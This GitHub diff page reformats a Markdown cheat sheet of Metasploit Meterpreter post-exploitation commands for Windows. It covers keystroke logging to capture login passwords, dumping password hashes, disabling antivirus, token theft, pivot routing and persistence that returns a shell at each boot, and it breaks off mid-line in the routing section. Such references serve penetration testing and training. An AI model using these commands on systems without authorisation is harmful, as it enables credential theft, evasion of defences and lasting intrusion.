You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: msf/meterpreter_files/windows_meterpreter.md
+42-19Lines changed: 42 additions & 19 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -142,25 +142,48 @@ Priv: Timestomp Commands
142
142
143
143
Run Command Examples
144
144
-------------------
145
-
Command Description
146
-
------- -----------
147
-
run vnc Start the VNC script included with meterpreter to get an interactive VNC session on the target.
148
-
run keylogrecorder Log all the keystrokes on the victim. For best results, make sure you are running in explorer.exe. To capture login
149
-
password, run this whilst within winlogon.exe.
150
-
run checkvm See if the target machine is running in a virtual machine.
151
-
run winenum Retrieve info about the Windows machine such as enviornment variables, user accounts, groups, interfaces, routes, etc
152
-
run scraper Downloads detailed system information such as password hashes, network shares, registry hives
153
-
run getcountermeasure Checks the security settings on the victim and can disable certain countermeasures.
154
-
run killav Disable any AntiVirus processes running on the target system if possible.
145
+
Command Description
146
+
------- -----------
147
+
run vnc Start the VNC script included with meterpreter to get an
148
+
interactive VNC session on the target.
149
+
run keylogrecorder Log all the keystrokes on the victim. For best results,
150
+
make sure you are running in explorer.exe. To capture
151
+
login passwords, run this whilst within winlogon.exe.
152
+
run checkvm See if the victim is running within a virtual machine.
153
+
run winenum Retrieve info about the Windows machine such as
154
+
environment variables, user accounts, groups,
155
+
interfaces, routes, etc.
156
+
run scraper Downloads detailed system information such as password
157
+
hashes, network shares, registry hives.
158
+
run getcountermeasures Checks the security settings on the victim and
159
+
can disable certain countermeasures.
160
+
run killav Disable any AntiVirus processes running on the
161
+
target system if possible.
155
162
156
163
Other Command Examples
157
164
--------------------------
158
-
Command Description
159
-
------- -----------
160
-
steal_token 456 Need to load incognito into meterpreter using "use incognito" prior to using this. Steals tokens from the specified
161
-
process to try impersonate an account. Check your UID afterwards even if there is an error as it may have still worked.
162
-
route add 192.168.1.0 255.255.255.0 3 Route all traffic destined to 192.168.1.0/24 though session 3.
163
-
load auto_add_route Automatically issue additional route commands for any previously unseen subnets whenever a new session is opened. So does the above command automatically basically for new discovered subnets.
164
-
route print Print the current routing table (subnet, netmask, and associated session that the traffic will be routed through).
165
-
run persistence -X *options* Install a script onto the victim machine that will automatically return a meterpreter shell every time it
166
-
starts.
165
+
Command Description
166
+
------- -----------
167
+
steal_token 456 Need to load incognito into meterpreter using
168
+
"use incognito" prior to using this. Steals tokens from
169
+
the specified process to try impersonate an account.
170
+
Check your UID afterwards even if there is an
171
+
error as it may have still worked.
172
+
173
+
route add 192.168.1.0 | Route all traffic destined to 192.168.1.0/24
0 commit comments